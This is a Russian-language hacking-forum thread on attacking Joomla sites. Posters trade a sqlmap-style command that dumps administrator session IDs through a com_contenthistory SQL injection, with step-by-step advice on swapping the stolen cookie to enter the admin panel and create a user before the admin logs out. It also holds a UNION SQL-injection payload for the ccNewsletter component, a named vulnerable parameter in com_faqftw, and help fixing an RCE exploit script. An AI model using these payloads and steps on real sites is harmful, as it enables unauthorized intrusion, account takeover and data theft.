Обзор уязвимостей CMS [Joomla,Mambo] и их компонентов

Discussion in 'Веб-уязвимости' started by it's my, 6 Oct 2007.

  1. proexp

    proexp Member

    Joined:
    20 Jan 2016
    Messages:
    6
    Likes Received:
    9
    Reputations:
    0
    okprodam likes this.
  2. ZodiaX

    ZodiaX Reservists Of Antichat

    Joined:
    7 May 2009
    Messages:
    533
    Likes Received:
    308
    Reputations:
    51
  3. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Парни подскажите решение задачки:
    джумла 3.4.3
    Joomla 1.5 - 3.4.5 - Object Injection Remote Command Execution (который записует шелл туда, где можно пописать)
    есть SQL Inj вполне рабочая
    при обращении к файлу с расширением php получаем No input file specified. (не распространяется на папку administrator)
    Есть пути сервера.

    Вопрос, как понять что нужно, что бы заработал сплоит? возвращает 200

    И еще, подскажите пожалуйста, как брутится соленый хеш от джумлы такого вида?
    $2y$10$rla38JSwQPTNw6lEyvekK.tyWSm2vdZyGCMDa.eb9FT6Jtoftz4E.
    К нему нужна соль? Если да, то где ее искать.

    Зарание спасибо.
     
    #343 ACat, 10 Mar 2017
    Last edited: 10 Mar 2017
  4. nitupme

    nitupme Member

    Joined:
    10 Oct 2015
    Messages:
    20
    Likes Received:
    5
    Reputations:
    0
    1. Чтобы РСЕ сработал, нужно что бы еще и сам сервак был определенной версии
    Проверять вот тут https://scan.patrolserver.com/joomla/CVE-2015-8562
    2. Такой хеш НИЧЕМ не брутится.

    =============================

    Решение задачи:
    1. Ждать пока админ зайдет на сайт, и спиздить сессию из таблицы xxxxx_sessions, только сначала посмотри последнюю дату визита админа. это может быть 1917 год и тогда это решение не прокатит. Если админ заходил на днях - лови его, через каждые 15 минут запускай
    -u "САЙТ/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&type_id=1&list[select]=*" --where="guest=0" --dump -D НАЗВАНИЕ_БД -T ТВОЙПРЕФ_session -C session_id

    ps. Если не получится скинь сайт в личку, гляну что с ним делать
     
    ACat likes this.
  5. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Спасибо. Сплоит не сработал.
    Сессии есть, но среди них нету не одной где guest=0
    Как грамотно подставить джумловские кукисы?
    в лс отписал.

    За хеш не понял... как так-то?
     
  6. nitupme

    nitupme Member

    Joined:
    10 Oct 2015
    Messages:
    20
    Likes Received:
    5
    Reputations:
    0
    Блять нету потому что на сайте никого нету.
    1. туда заходили вчера - значит сайт живой и ходят туда постоянно.
    2. когда кто нибудь зайдет - появится сейссия guest=1
    3. дампишь ее
    4. я исплую плагин cookie manager для firefox
    5. заходишь сайт.com/administrator
    6. врубаешь cookie manager и ищеш сайт
    7. заменяешь сессию
    8. обновляешь страницу администратора и ты в админке
    9. создаешь быстро юзера пока админ не вышел
     
    ACat likes this.
  7. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Доступно, спасибо.

    Ребят, а если я извлек из бд конструкцию ввида
    Code:
    __default|a:7:{s:15:"session.counter";i:1;s:19:"session.timer.start";i:1489159042;s:18:"session.timer.last";i:1489159042;s:17:"session.timer.now";i:1489159042;s:22:"session.client.browser";s:171:"Mozilla/5.0 (Linux; Android 4.4.4; SM-T116 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36 [FB_IAB/FB4A;FBAV/114.0.0.20.70;]";s:8:"registry";O:24:"Joomla\\Registry\\Registry":2:{s:7:"\\0\\0\\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:4:"user";O:5:"JUser":26:{s:9:"\\0\\0\\0isRoot";b:0;s:2:"id";i:0;s:4:"name";N;s:8:"username";N;s:5:"email";N;s:8:"password";N;s:14:"password_clear";s:0:"";s:5:"block";N;s:9:"sendEmail";i:0;s:12:"registerDate";N;s:13:"lastvisitDate";N;s:10:"activation";N;s:6:"params";N;s:6:"groups";a:1:{i:0;s:1:"1";}s:5:"guest";i:1;s:13:"lastResetTime";N;s:10:"resetCount";N;s:12:"requireReset";N;s:10:"\\0\\0\\0_params";O:24:"Joomla\\Registry\\Registry":2:{s:7:"\\0\\0\\0data";O:8:"stdClass":0:{}s:9:"separator";s:1:".";}s:14:"\\0\\0\\0_authGroups";a:1:{i:0;i:1;}s:14:"\\0\\0\\0_authLevels";a:2:{i:0;i:1;i:1;i:1;}s:15:"\\0\\0\\0_authActions";N;s:12:"\\0\\0\\0_errorMsg";N;s:13:"\\0\\0\\0userHelper";O:18:"JUserWrapperHelper":0:{}s:10:"\\0\\0\\0_errors";a:0:{}s:3:"aid";i:0;}}
    
    как преобразовать это в кукис?
     
    #347 ACat, 10 Mar 2017
    Last edited: 10 Mar 2017
  8. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    разобрался, все оказалось до боли просто.
    Сори за флуд
     
    #348 ACat, 10 Mar 2017
    Last edited: 13 Mar 2017
  9. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    268
    Likes Received:
    35
    Reputations:
    0
    на 3Х он тоже вроде работает, но сама уязвимость не срабатывает
     
  10. Xeeper

    Xeeper New Member

    Joined:
    6 Mar 2005
    Messages:
    19
    Likes Received:
    2
    Reputations:
    0
    Парни, подскажите пожалуйста, пытаюсь протестировать сайт с помощью следующего эксплоита:
    http://pastebin.com/raw/Xs8k2cHG
    Видео его работы тут:

    Стоит Python 3
    при попытке запуска файла с эксплоитом в интерпретаторе вылазеет ошибка:
    Code:
    line 48
        print get_url(i, pl)
                    ^
    SyntaxError: invalid syntax
    Подскажите что может быть не так?
     
    ACat likes this.
  11. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Оператор print был заменён функцией print(), с именованными аргументами для замены большей части синтаксиса старого оператора print
    Используйте 2-ю версию python вместо 3 или перепишите код вручную под 3ю ветку
     
    Xeeper and ACat like this.
  12. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Парни, а если админ не заходит на сайт можно ли с помощью SQL inj попробовать востановить пароль админа?
     
  13. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    SQL-инъекция в компоненте ccNewsletter v2.1.9

    option=com_ccnewsletter&view=detail&id=73&sbid=-3094 UNION ALL SELECT NULL,NULL,CONCAT(0x7162626a71,0x4357474c4d556472646b43704f44476e64694f6a6d6d6873795552656d5446767846466e63677974,0x71766b6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- CCQB&tmpl=newsletter


    Источник https://waf.pentestit.ru/vulns/844
     
    _________________________
    t0ma5 likes this.
  14. GreenGO

    GreenGO Member

    Joined:
    2 May 2013
    Messages:
    434
    Likes Received:
    53
    Reputations:
    2
    Вроде не было нигде.
    SQL-инъекция joomla 3.x
    Компонент option=com_faqftw уязвимый параметр item
     
  15. serg1234

    serg1234 Banned

    Joined:
    9 Nov 2017
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
  16. pritomnik

    pritomnik New Member

    Joined:
    19 Oct 2011
    Messages:
    56
    Likes Received:
    1
    Reputations:
    0
    В 99% случаях никак) Забудь!
     
  17. serg1234

    serg1234 Banned

    Joined:
    9 Nov 2017
    Messages:
    13
    Likes Received:
    1
    Reputations:
    0
    ну 1% надежды - это уже немало! )
    в принципе скрипт этот я нашел, но он не выполняет полный перебор - делает один цикл и завершает работу - не понятно пока отчего так
     
  18. nitupme

    nitupme Member

    Joined:
    10 Oct 2015
    Messages:
    20
    Likes Received:
    5
    Reputations:
    0
  19. Pop-Xlop

    Pop-Xlop Member

    Joined:
    26 Aug 2019
    Messages:
    20
    Likes Received:
    22
    Reputations:
    8
    Направление показано верное, а сплойт естественно работать не будет. Да и не актуально уже станет через пару дней.
     
  20. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,414
    Likes Received:
    911
    Reputations:
    863
    Это старая бага, что была в jooml'e, Version: 3.0.0 --> 3.4.6, RCE через унсериализацию, просто видимо выложили свою реализацию эксплоита...
     
    _________________________